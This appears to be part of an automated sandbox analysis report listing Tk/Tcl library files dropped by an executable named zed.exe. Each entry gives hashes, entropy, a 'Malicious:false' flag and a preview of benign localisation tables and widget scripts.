                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset fi "&Abort" "&Keskeyt\u00e4".. ::msgcat::mcset fi "&About..." "&Tietoja...".. ::msgcat::mcset fi "All Files" "Kaikki tiedostot".. ::msgcat::mcset fi "Application Error" "Ohjelmavirhe".. ::msgcat::mcset fi "&Apply" "K\u00e4&yt\u00e4".. ::msgcat::mcset fi "Bold" "Lihavoitu".. ::msgcat::mcset fi "Bold Italic" "Lihavoitu, kursivoitu".. ::msgcat::mcset fi "&Blue" "&Sininen".. ::msgcat::mcset fi "Cancel" "Peruuta".. ::msgcat::mcset fi "&Cancel" "&Peruuta".. ::msgcat::mcset fi "Cannot change to the directory \"%1\$s\".\nPermission denied." "Ei voitu vaihtaa hakemistoon \"%1\$s\".\nLupa ev\u00e4tty.".. ::msgcat::mcset fi "Choose Directory" "Valitse hakemisto".. ::msgcat::mcset fi "Cl&ear" "&Tyhjenn\u00e4".. ::msgcat::mcset fi "&Clear Console" "&Tyhjenn\u00e4 konsoli".. ::msgcat::mcset fi "Color" "V\u00e4ri".. ::msgcat::mcset fi "Console" "Konsoli".. ::msgcat::mcset fi "&Copy" "K&opioi".. ::msgcat::mcs
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3877
                                                                                                                                                                                                                                            Entropy (8bit):4.630737553723335
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nByEWs/3lHFB9FamsIfSAzZ2eaISAxh0BRc3jC:nByEWaRNzsSSWonMAv
                                                                                                                                                                                                                                            MD5:E279E5FFF03E1B8E9063ABC8A499A6BD
                                                                                                                                                                                                                                            SHA1:80910911F6B4830BA4DCBA9A9EAD12C9F802DDC9
                                                                                                                                                                                                                                            SHA-256:3F2CEB4A33695AB6B56E27F61A4C60C029935BB026497D99CB2C246BCB4A63C4
                                                                                                                                                                                                                                            SHA-512:8333388E421AC3F342317BEBE352809B0B190EF8B044A0BAE2FE4051974D86008BAFDCB7098E9DC39A8D9E1E08FB87F54B9D3388AF2D0185FF913DB6788C5AB5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset fr "&Abort" "&Annuler".. ::msgcat::mcset fr "About..." "\u00c0 propos...".. ::msgcat::mcset fr "All Files" "Tous les fichiers".. ::msgcat::mcset fr "Application Error" "Erreur d'application".. ::msgcat::mcset fr "&Blue" "&Bleu".. ::msgcat::mcset fr "Cancel" "Annuler".. ::msgcat::mcset fr "&Cancel" "&Annuler".. ::msgcat::mcset fr "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossible d'acc\u00e9der au r\u00e9pertoire \"%1\$s\".\nPermission refus\u00e9e.".. ::msgcat::mcset fr "Choose Directory" "Choisir r\u00e9pertoire".. ::msgcat::mcset fr "Cl&ear" "Effacer".. ::msgcat::mcset fr "Color" "Couleur".. ::msgcat::mcset fr "Console".. ::msgcat::mcset fr "Copy" "Copier".. ::msgcat::mcset fr "Cu&t" "Couper".. ::msgcat::mcset fr "Delete" "Effacer".. ::msgcat::mcset fr "Details >>" "D\u00e9tails >>".. ::msgcat::mcset fr "Directory \"%1\$s\" does not exist." "Le r\u00e9pertoire \"%1\$s\"
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4678
                                                                                                                                                                                                                                            Entropy (8bit):4.7955991577265245
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:nkCEz2TTrKmA17fzq/Hj+pUva+fQR/a5a/Thn5kU:kTqM17u/8NiMrhb
                                                                                                                                                                                                                                            MD5:4F1610E0C73DAE668E3F9D9235631152
                                                                                                                                                                                                                                            SHA1:63EE54A6C1A69B798C65C999D5F80A7AB252B6D8
                                                                                                                                                                                                                                            SHA-256:E063AD7CA93F37728A65E4CD7C0433950F22607D307949F6CB056446AFEAA4FE
                                                                                                                                                                                                                                            SHA-512:37F4B8A9CD020A77591C09AF40FBC2FA82107B2596D31B5F30CE6ECAA225417CF7A5C62FB7A93539B0D7E930D0A44F9BF2EE6BE113F831B0A72B229444672AFD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset hu "&Abort" "&Megszak\u00edt\u00e1s".. ::msgcat::mcset hu "&About..." "N\u00e9vjegy...".. ::msgcat::mcset hu "All Files" "Minden f\u00e1jl".. ::msgcat::mcset hu "Application Error" "Alkalmaz\u00e1s hiba".. ::msgcat::mcset hu "&Blue" "&K\u00e9k".. ::msgcat::mcset hu "Cancel" "M\u00e9gsem".. ::msgcat::mcset hu "&Cancel" "M\u00e9g&sem".. ::msgcat::mcset hu "Cannot change to the directory \"%1\$s\".\nPermission denied." "A k\u00f6nyvt\u00e1rv\u00e1lt\u00e1s nem siker\u00fclt: \"%1\$s\".\nHozz\u00e1f\u00e9r\u00e9s megtagadva.".. ::msgcat::mcset hu "Choose Directory" "K\u00f6nyvt\u00e1r kiv\u00e1laszt\u00e1sa".. ::msgcat::mcset hu "Cl&ear" "T\u00f6rl\u00e9s".. ::msgcat::mcset hu "&Clear Console" "&T\u00f6rl\u00e9s Konzol".. ::msgcat::mcset hu "Color" "Sz\u00edn".. ::msgcat::mcset hu "Console" "Konzol".. ::msgcat::mcset hu "&Copy" "&M\u00e1sol\u00e1s".. ::msgcat::mcset hu "Cu&t" "&Kiv\u00e1g\u00e1s".. ::ms
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3765
                                                                                                                                                                                                                                            Entropy (8bit):4.49679862548805
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nmU4xnonTjwUE5Xs6ZrT8BpXAg+Wr+u92C8t7mU9nUSs:nZ4FonFE58HBpXjr+fBJs
                                                                                                                                                                                                                                            MD5:B74C54666A5A431A782DB691B4CA3315
                                                                                                                                                                                                                                            SHA1:2BC63982C14BBA8A4C451CE31540181F40CE2216
                                                                                                                                                                                                                                            SHA-256:806930F283FD097195C7850E3486B3815D1564529B4F8E5FA6D26F3175183BC1
                                                                                                                                                                                                                                            SHA-512:8120E2FFD14E0A992E254796ADDC0DC995C921BE31688C0995D7A36FE82609D78791FEF73EAF5B14E2F0D40AD256AB8DAAA07C18E6950362B28E40B71E47C0B6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset it "&Abort" "&Interrompi".. ::msgcat::mcset it "&About..." "Informazioni...".. ::msgcat::mcset it "All Files" "Tutti i file".. ::msgcat::mcset it "Application Error" "Errore dell' applicazione".. ::msgcat::mcset it "&Blue" "&Blu".. ::msgcat::mcset it "Cancel" "Annulla".. ::msgcat::mcset it "&Cancel" "&Annulla".. ::msgcat::mcset it "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossibile accedere alla directory \"%1\$s\".\nPermesso negato.".. ::msgcat::mcset it "Choose Directory" "Scegli una directory".. ::msgcat::mcset it "Cl&ear" "Azzera".. ::msgcat::mcset it "&Clear Console" "Azzera Console".. ::msgcat::mcset it "Color" "Colore".. ::msgcat::mcset it "Console".. ::msgcat::mcset it "&Copy" "Copia".. ::msgcat::mcset it "Cu&t" "Taglia".. ::msgcat::mcset it "Delete" "Cancella".. ::msgcat::mcset it "Details >>" "Dettagli >>".. ::msgcat::mcset it "Directory \"%1\$s\" does not ex
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):4.524344068436489
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nucQswBju0x0M4U2z9KSSOzZL5KhWTqGGIrlxXvhYbL/ZO5NT+T4kiLzzdDf1SDM:nLGa0x0Mp2KSHKSv2bL/ZO5u6nRfAXU9
                                                                                                                                                                                                                                            MD5:E56229BAC5A8ABB90C4DD8EE3F9FF9F8
                                                                                                                                                                                                                                            SHA1:7527D6C3C6C84BFF0E683FFA86A21C58458EB55D
                                                                                                                                                                                                                                            SHA-256:0914FBA42361227D14FA281E8A9CBF57C16200B4DA1E61CC3402EF0113A512C7
                                                                                                                                                                                                                                            SHA-512:13649DDB06DB4BA9E39BEAF828211086A519444DA9AB5CBDD1B88B29208388189A5141F75AD94B56A348EDDE534FFADE8B19B557CB988EA4ECC9A84B135D36C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset nl "&Abort" "&Afbreken".. ::msgcat::mcset nl "&About..." "Over...".. ::msgcat::mcset nl "All Files" "Alle Bestanden".. ::msgcat::mcset nl "Application Error" "Toepassingsfout".. ::msgcat::mcset nl "&Apply" "Toepassen".. ::msgcat::mcset nl "Bold" "Vet".. ::msgcat::mcset nl "Bold Italic" "Vet Cursief".. ::msgcat::mcset nl "&Blue" "&Blauw".. ::msgcat::mcset nl "Cancel" "Annuleren".. ::msgcat::mcset nl "&Cancel" "&Annuleren".. ::msgcat::mcset nl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan niet naar map \"%1\$s\" gaan.\nU heeft hiervoor geen toestemming.".. ::msgcat::mcset nl "Choose Directory" "Kies map".. ::msgcat::mcset nl "Cl&ear" "Wissen".. ::msgcat::mcset nl "&Clear Console" "&Wis Console".. ::msgcat::mcset nl "Color" "Kleur".. ::msgcat::mcset nl "Console".. ::msgcat::mcset nl "&Copy" "Kopi\u00ebren".. ::msgcat::mcset nl "Cu&t" "Knippen".. ::msgcat::mcset nl "&Dele
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4932
                                                                                                                                                                                                                                            Entropy (8bit):4.799369674927008
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nXra9E310fwNCeVsvSmy6MZv8lWBTDGdZ3tojTyrEQmAUCIx4wBxZ:n7a9Q0fyw5MQWgP3uoZChB3
                                                                                                                                                                                                                                            MD5:8CFA2E38822303FDCB55AE3277F0B81B
                                                                                                                                                                                                                                            SHA1:447F28A5064FCEA019C60B3F9B6D50CD43C2D0E3
                                                                                                                                                                                                                                            SHA-256:EACEB1F08DE0863CCF726881E07FE5B135EA09646C5253E0CBF7DDB987EB0D92
                                                                                                                                                                                                                                            SHA-512:E38BA9059AFF55C2B22A4AE24D6A76149C76DBA8BF8646AE81D6E07D7ED490D0605034B29D9AC848E6685C8EC26A3DBE5B2EAF462B14D96376E80076FBE7082A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset pl "&Abort" "&Przerwij".. ::msgcat::mcset pl "&About..." "O programie...".. ::msgcat::mcset pl "All Files" "Wszystkie pliki".. ::msgcat::mcset pl "Application Error" "B\u0142\u0105d w programie".. ::msgcat::mcset pl "&Apply" "Zastosuj".. ::msgcat::mcset pl "Bold" "Pogrubienie".. ::msgcat::mcset pl "Bold Italic" "Pogrubiona kursywa".. ::msgcat::mcset pl "&Blue" "&Niebieski".. ::msgcat::mcset pl "Cancel" "Anuluj".. ::msgcat::mcset pl "&Cancel" "&Anuluj".. ::msgcat::mcset pl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nie mo\u017cna otworzy\u0107 katalogu \"%1\$s\".\nOdmowa dost\u0119pu.".. ::msgcat::mcset pl "Choose Directory" "Wybierz katalog".. ::msgcat::mcset pl "Cl&ear" "&Wyczy\u015b\u0107".. ::msgcat::mcset pl "&Clear Console" "&Wyczy\u015b\u0107 konsol\u0119".. ::msgcat::mcset pl "Color" "Kolor".. ::msgcat::mcset pl "Console" "Konsola".. ::msgcat::mcset pl "&Copy" "&Kopiu
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3987
                                                                                                                                                                                                                                            Entropy (8bit):4.63232183429232
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nHOT1mM5qHHxiBHb3joTjtcp2UqMxweo6VvilCMKKXx9vjM:nHOT1mMQnwB/otcUUpGX6VPVoLjM
                                                                                                                                                                                                                                            MD5:4018686F2A8E299D86BDB1478BC97896
                                                                                                                                                                                                                                            SHA1:0EECE3D57F2EA5EECE8157B06F3AFB97E1F2551A
                                                                                                                                                                                                                                            SHA-256:D687F71F0432BB0D02EFDF576E526D2C19D4136F76C41A3224A2F034168F3F34
                                                                                                                                                                                                                                            SHA-512:4D730068B2A21E1D6004205B10A9D0D5EE9683FEB03B6FB673E8B9B94ED6BE468086A52DFE97C4DBF35A07CBB2C5E276DF0952A06C78E029D53D796CB6FCC8DF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset pt "&Abort" "&Abortar".. ::msgcat::mcset pt "About..." "Sobre ...".. ::msgcat::mcset pt "All Files" "Todos os arquivos".. ::msgcat::mcset pt "Application Error" "Erro de aplica\u00e7\u00e3o".. ::msgcat::mcset pt "&Blue" "&Azul".. ::msgcat::mcset pt "Cancel" "Cancelar".. ::msgcat::mcset pt "&Cancel" "&Cancelar".. ::msgcat::mcset pt "Cannot change to the directory \"%1\$s\".\nPermission denied." "N\u00e3o foi poss\u00edvel mudar para o diret\u00f3rio \"%1\$s\".\nPermiss\u00e3o negada.".. ::msgcat::mcset pt "Choose Directory" "Escolha um diret\u00f3rio".. ::msgcat::mcset pt "Cl&ear" "Apagar".. ::msgcat::mcset pt "&Clear Console" "Apagar Console".. ::msgcat::mcset pt "Color" "Cor".. ::msgcat::mcset pt "Console".. ::msgcat::mcset pt "&Copy" "Copiar".. ::msgcat::mcset pt "Cu&t" "Recortar".. ::msgcat::mcset pt "&Delete" "Excluir".. ::msgcat::mcset pt "Details >>" "Detalhes >>".. ::msgcat::mcset pt "D
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8620
                                                                                                                                                                                                                                            Entropy (8bit):4.477728981060218
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:n9MEBGkFKT4YHCDhxqEMk0yOC2xXLtSRoxwKl9zFAWx2yuV9cDcwRjnWNQuNFNfO:T0rm8IONoRkN1w+jRQ/FoxrRHRJP
                                                                                                                                                                                                                                            MD5:C69A904A57FDC95520086E9DDFED362C
                                                                                                                                                                                                                                            SHA1:F0220602ABE91FE563E5AA6A4EA4AB43818C0CFC
                                                                                                                                                                                                                                            SHA-256:F0D310A2EE9C0AF928D822CBB39BCBE54FB2C1C95EE8167DFFD55EDC1B2FE040
                                                                                                                                                                                                                                            SHA-512:808B82F29B7BA06AF5AE44C6C23EC8DD743E93B391F060C7586D6D3FF26C97294BD11AD215848EBA422491BD50C4509330DD24C83134C7A384E81304133CAADB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset ru "&Abort" "&\u041e\u0442\u043c\u0435\u043d\u0438\u0442\u044c".. ::msgcat::mcset ru "&About..." "\u041f\u0440\u043e...".. ::msgcat::mcset ru "All Files" "\u0412\u0441\u0435 \u0444\u0430\u0439\u043b\u044b".. ::msgcat::mcset ru "Application Error" "\u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435".. ::msgcat::mcset ru "&Apply" "&\u041f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c".. ::msgcat::mcset ru "Bold" "Bold".. ::msgcat::mcset ru "Bold Italic" "Bold Italic".. ::msgcat::mcset ru "&Blue" " &\u0413\u043e\u043b\u0443\u0431\u043e\u0439".. ::msgcat::mcset ru "Cancel" "\u041e\u0442\u043c\u0435\u043d\u0430".. ::msgcat::mcset ru "&Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430".. ::msgcat::mcset ru "Cannot change to the directory \"%1\$s\".\nPermission denied." \....."\u041d\u0435 \u043c\u043e\u0433\u0443 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u043
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3908
                                                                                                                                                                                                                                            Entropy (8bit):4.658068191079967
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nT8A5cbwKmtI1sE9xt6BDyepTr2iiK/yGqXZlBp9:nD5cb2extDepTCnVpJ9
                                                                                                                                                                                                                                            MD5:1D085A672A6FCDECEF5D7D876E4C74A3
                                                                                                                                                                                                                                            SHA1:1A40C03F15A6926359CA3E5C0A809485CAD28AEE
                                                                                                                                                                                                                                            SHA-256:A6821A13D34FB31F1827294B82C4BF9586BB255CA14F78C3ACE11181F42EF211
                                                                                                                                                                                                                                            SHA-512:981EDEEF5E4C915BB8F10044096B412D1855CAD08F98A448C6C0A49A54222945EBD102DDCB9525535E0FB19313C319155FA59384605B2C36CC8B4A58693D57E7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset sv "&Abort" "&Avsluta".. ::msgcat::mcset sv "&About..." "&Om...".. ::msgcat::mcset sv "All Files" "Samtliga filer".. ::msgcat::mcset sv "Application Error" "Programfel".. ::msgcat::mcset sv "&Blue" "&Bl\u00e5".. ::msgcat::mcset sv "Cancel" "Avbryt".. ::msgcat::mcset sv "&Cancel" "&Avbryt".. ::msgcat::mcset sv "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ej n\u00e5 mappen \"%1\$s\".\nSaknar r\u00e4ttigheter.".. ::msgcat::mcset sv "Choose Directory" "V\u00e4lj mapp".. ::msgcat::mcset sv "Cl&ear" "&Radera".. ::msgcat::mcset sv "&Clear Console" "&Radera konsollen".. ::msgcat::mcset sv "Color" "F\u00e4rg".. ::msgcat::mcset sv "Console" "Konsoll".. ::msgcat::mcset sv "&Copy" "&Kopiera".. ::msgcat::mcset sv "Cu&t" "Klipp u&t".. ::msgcat::mcset sv "&Delete" "&Radera".. ::msgcat::mcset sv "Details >>" "Detaljer >>".. ::msgcat::mcset sv "Directory \"%1\$s\" does not exist." "Mapp
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4951
                                                                                                                                                                                                                                            Entropy (8bit):5.319678095131993
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nnIoT3wHqLHQslojYhOvZSVGNUpi6Zz0qBAE9A+uiTrBsyqCgnPLz:nnIoT3wHU/osIAwNILt0HE2oV6CgPLz
                                                                                                                                                                                                                                            MD5:1435107EB17A09E4AD7277FFA1C76913
                                                                                                                                                                                                                                            SHA1:9990C26829275F16C6FC494D32C4298EC541E7D3
                                                                                                                                                                                                                                            SHA-256:B6802B7B080A2D8BC3D81614EC55A609CB5EF673C7A81E93E07925D6710F90DD
                                                                                                                                                                                                                                            SHA-512:4B2CAE4FA135411761D5B7CBFFABCE87D745A9B6496C7FD7C4AF10E76EE36E51CA62A1417CF6C27070EFF9539A305BE45C010AE4F8532C8C2D915FA101F5157E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:namespace eval ::tk {.. ::msgcat::mcset zh_cn "&Abort" "&..".. ::msgcat::mcset zh_cn "&About..." "&....".. ::msgcat::mcset zh_cn "All Files" "....".. ::msgcat::mcset zh_cn "Application Error" "......".. ::msgcat::mcset zh_cn "&Apply" "&..".. ::msgcat::mcset zh_cn "Bold" "..".. ::msgcat::mcset zh_cn "Bold Italic" "....".. ::msgcat::mcset zh_cn "&Blue" "&..".. ::msgcat::mcset zh_cn "Cancel" "..".. ::msgcat::mcset zh_cn "&Cancel" "&..".. ::msgcat::mcset zh_cn "Cannot change to the directory \"%1\$s\".\nPermission denied." "...... \"%1\$s\".\n......".. ::msgcat::mcset zh_cn "Choose Directory" ".....".. ::msgcat::mcset zh_cn "Cl&ear" ".&.".. ::msgcat::mcset zh_cn "&Clear Console" "&....".. ::msgcat::mcset zh_cn "Color" "..".. ::msgcat::mcset zh_cn "Console" "..".. ::msgcat::mcset zh_cn "&Copy" "&..".. ::msgcat::mcset zh
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5772
                                                                                                                                                                                                                                            Entropy (8bit):5.038729016734604
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:onzxtm7EMgdMjwPqeuAmz9LD1kFIQETZqoIK/RLf7w:ozxtm7qUwi79l0sZqoBJLDw
                                                                                                                                                                                                                                            MD5:FC9E03823BEB08DAF7681C09D106DF7D
                                                                                                                                                                                                                                            SHA1:7D06FC8F98140E0FFAA2571BD522FC772E58DE54
                                                                                                                                                                                                                                            SHA-256:540EEECBA17207A56290BAFFDAE882BBD4F88364791204AD5D14C7BEDD022CCC
                                                                                                                                                                                                                                            SHA-512:2B5BAD311A703A0FE2ED67ACE311BAD4C767BCD23DFC3D9ABDF5C3604146A6A15D6BD13A14BDEFCDB2B602C708AACFAB404E96FCBA7C546AD0DAECD4BE2EB34A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# obsolete.tcl --..#..# This file contains obsolete procedures that people really shouldn't..# be using anymore, but which are kept around for backward compatibility...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# The procedures below are here strictly for backward compatibility with..# Tk version 3.6 and earlier. The procedures are no longer needed, so..# they are no-ops. You should not use these procedures anymore, since..# they may be removed in some future release.....proc tk_menuBar args {}..proc tk_bindForTraversal args {}....# ::tk::classic::restore --..#..# Restore the pre-8.5 (Tk classic) look as the widget defaults for classic..# Tk widgets...#..# The value following an 'option add' call is the new 8.5 value...#..namespace eval ::tk::classic {.. # This may need t
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1629
                                                                                                                                                                                                                                            Entropy (8bit):4.784780799273752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:g2hBuOrlkBytcqYXRE5fvvXq1EhJPqOj6Wf0cVlN:gQ6q4E5HCqhBqOhcaD
                                                                                                                                                                                                                                            MD5:9B7A8FD2C6B538FF31BDC380452C6DE3
                                                                                                                                                                                                                                            SHA1:3F915BFE85CED9F6C7E9A352718770E9F14F098E
                                                                                                                                                                                                                                            SHA-256:40CA505C9784B0767D4854485C5C311829594A4FCBDFD7251E60E6BB7EA74FD1
                                                                                                                                                                                                                                            SHA-512:43937152B844BE1E597E99DA1270E54AB1D572AE89CB759E6D41C18C9C8044CCC15A6925F9C5AF617AE9EC1404E78C2733231F4D5C6CFE4D23C546387B1FC328
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# optMenu.tcl --..#..# This file defines the procedure tk_optionMenu, which creates..# an option button and its associated menu...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_optionMenu --..# This procedure creates an option button named $w and an associated..# menu. Together they provide the functionality of Motif option menus:..# they can be used to select one of many values, and the current value..# appears in the global variable varName, as well as in the text of..# the option menubutton. The name of the menu is returned as the..# procedure's result, so that the caller can use it to change configuration..# options on the menu or otherwise manipulate it...#..# Arguments:..# w -...The name to use for the menubutton...# varName -..Global variable to hold the currently
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8418
                                                                                                                                                                                                                                            Entropy (8bit):4.964814946573677
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:HWh/x+hFMyTA/CTzxFoUuliRLDm8pQrQlENPyF3o48M6C:HWL+MyTA/CTzvAiRqyEw3ok
                                                                                                                                                                                                                                            MD5:4CE08A10CD9AE941654B8C679DF669F3
                                                                                                                                                                                                                                            SHA1:F1288BABCA698FD18C3BD221E6AE6C02F2975AAE
                                                                                                                                                                                                                                            SHA-256:849B4C57E4644E51BEAEAEB3AE59B7FF067E582ECD10F1B2CAF6B6E72F11F506
                                                                                                                                                                                                                                            SHA-512:0F37539DA3540E9B1DA7B0377E3BBB359B71DB4271D63BC9501E95931B4E609E8CB91DC2F7B08A6452598D4A0D58C6A2034049A215000EEF0F93A9963D003632
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# palette.tcl --..#..# This file contains procedures that change the color palette used..# by Tk...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_setPalette --..# Changes the default color scheme for a Tk application by setting..# default colors in the option database and by modifying all of the..# color options for existing widgets that have the default value...#..# Arguments:..# The arguments consist of either a single color name, which..# will be used as the new background color (all other colors will..# be computed from this) or an even number of values consisting of..# option names and values. The name for an option is the one used..# for the option database, such as activeForeground, not -activeforeground.....proc ::tk_setPalette {args} {.. if {[winfo depth .] == 1} {...# Just return on monochrome displays, otherwise errors
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5370
                                                                                                                                                                                                                                            Entropy (8bit):4.979530133775421
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:ssAXzkTQ9w5fLQYkJLZkRXKUXfwyZTq2sz8j2Em3YKhrYK:jAXgE0DQpJLGR6UXfpqnzG3m3YKhrYK
                                                                                                                                                                                                                                            MD5:286C01A1B12261BC47F5659FD1627ABD
                                                                                                                                                                                                                                            SHA1:4CA36795CAB6DFE0BBBA30BB88A2AB71A0896642
                                                                                                                                                                                                                                            SHA-256:AA4F87E41AC8297F51150F2A9F787607690D01793456B93F0939C54D394731F9
                                                                                                                                                                                                                                            SHA-512:D54D5A89B7408A9724A1CA1387F6473BDAD33885194B2EC5A524C7853A297FD65CE2A57F571C51DB718F6A00DCE845DE8CF5F51698F926E54ED72CDC81BCFE54
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# panedwindow.tcl --..#..# This file defines the default bindings for Tk panedwindow widgets and..# provides procedures that help in implementing those bindings.....bind Panedwindow <Button-1> { ::tk::panedwindow::MarkSash %W %x %y 1 }..bind Panedwindow <Button-2> { ::tk::panedwindow::MarkSash %W %x %y 0 }....bind Panedwindow <B1-Motion> { ::tk::panedwindow::DragSash %W %x %y 1 }..bind Panedwindow <B2-Motion> { ::tk::panedwindow::DragSash %W %x %y 0 }....bind Panedwindow <ButtonRelease-1> {::tk::panedwindow::ReleaseSash %W 1}..bind Panedwindow <ButtonRelease-2> {::tk::panedwindow::ReleaseSash %W 0}....bind Panedwindow <Motion> { ::tk::panedwindow::Motion %W %x %y }....bind Panedwindow <Leave> { ::tk::panedwindow::Leave %W }....# Initialize namespace..namespace eval ::tk::panedwindow {}....# ::tk::panedwindow::MarkSash --..#..# Handle marking the correct sash for possible dragging..#..# Arguments:..# w..the widget..# x..widget local x coord..# y..widget local y coord..# proxy.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):376
                                                                                                                                                                                                                                            Entropy (8bit):5.040809246948068
